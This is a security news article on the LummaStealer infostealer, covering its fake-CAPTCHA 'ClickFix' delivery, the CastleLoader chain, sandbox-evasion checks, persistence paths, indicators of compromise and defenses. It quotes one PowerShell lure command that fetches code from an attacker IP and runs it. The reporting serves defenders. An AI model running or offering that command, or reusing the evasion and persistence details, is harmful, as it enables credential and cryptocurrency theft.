Fake CAPTCHA Attacks Fuel LummaStealer Malware Surge

A sharp rise in LummaStealer infections worldwide, despite a major law enforcement takedown last year.

This information-stealing malware, first seen on Russian forums in late 2022, operates under a malware-as-a-service (MaaS) model, letting affiliates subscribe for $250 to $20,000 for features like custom loaders and C2 panels.

It targets Windows systems, grabbing browser credentials, cookies, crypto wallets, 2FA tokens, Discord/Steam data, screenshots, and clipboard info.

Operators rebuilt fast after Microsoft’s May 2025 action seized 2,300+ C2 domains, migrating to bulletproof hosts and swapping loaders like Rugmi or DonutLoader for CastleLoader.

Telemetry from December 2025 to January 2026 shows a global spread, peaking in India, the US, and Europe.

Delivery Tactics and CastleLoader Breakdown

Social engineering drives most infections no zero-days needed. Victims run files from fake cracked software such as “autocad 2008 keygen,” games such as “Dark Souls full.exe,” or movie torrents such as “avatar fire and ash 2025.mp4.exe.”

These often use self-extracting archives or NSIS installers that chain to CastleLoader via cmd.exe and extrac32 on .cab files.

Fake CAPTCHA “ClickFix” is surging: sites mimic Cloudflare checks, hijack clipboard with encoded PowerShell like “&(gal wg*) -useb hxxp://45.221.64.224/12.d|iex,” urging Win+R paste-and-run.

This fetches loaders directly, bypassing downloads legit platforms like Steam, Discord, or itch.io host bait to gain credibility.​

CastleLoader, tied to the threat group GrayBravo, uses AutoIt (or Python) scripts compiled into exes for evasion.

Obfuscation includes dictionary variables (e.g., $COMMONLYOMAN), hex string decodes with XOR keys, and junk ops like pointless math.

Sandbox evasion: checks COMPUTERNAME=”tz” or USERNAME=”test22,” pings fake domains like “sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH” (repeated-string pattern for DNS hunting), scans vmtoolsd.exe/VboxTray.exe/SandboxieRpcSs.exe, or sleeps on avastui.exe.

Persistence adapts: drops to %LocalAppData%CraftStitch Studios IncV.a3x or AutoIt3.exe if Avast/Bitdefender/Sophos run, creates StitchCraftX.lnk shortcuts, and Startup .url files via DllCall CreateProcessW or direct write.

Payloads decrypt via dual XOR shellcodes, LZNT1 decompress, then inject MZ/PE like Lumma. Infra overlap with Lumma suggests shared providers.​

VBA layers add scheduled tasks: wscript.exe runs a JS script that sets schtasks /sc minute for repeating.​

Stealing Power, Global Impact, and Defenses

Lumma exfils via C2: emails (Gmail/Outlook), VPN .ovpn, FTP, AnyDesk, KeePass, MetaMask/Binance wallets, plus system specs for profiling.

Impacts: account hijacks (bypass via cookies), crypto theft, ID fraud from .pdf/.docx docs, extortion via adult lures or “surveillance” claims.

Key IoCs from analysis:

• Paths: %LocalAppData%CraftStitch Studios IncStitchCraftX.*
• Procs: extrac32 /Y *.cab, AutoIt3.exe V.a3x, Rope.pif b
• DNS: <randstr>.<randstr> fails (e.g., sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH)
• Persistence: StitchCraftX.url in %Startup%

According to Bitdefender, avoid pirated/cracked files, torrent “movies,” and manual cmds; verify the CAPTCHA doesn’t ask for Run/PowerShell.

If hit, rotate creds (email/finance first), nuke sessions, reinstall OS. Orgs: Train on ClickFix, enforce MFA, watch LOLBins (extrac32/cmd), anomalous DNS/processes via EDR. Behavioral rules beat sigs as MaaS evolves.

Lumma’s resilience shows MaaS ecosystems thrive on user trust abuse stay vigilant.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post Fake CAPTCHA Attacks Fuel LummaStealer Malware Surge appeared first on Cyber Security News.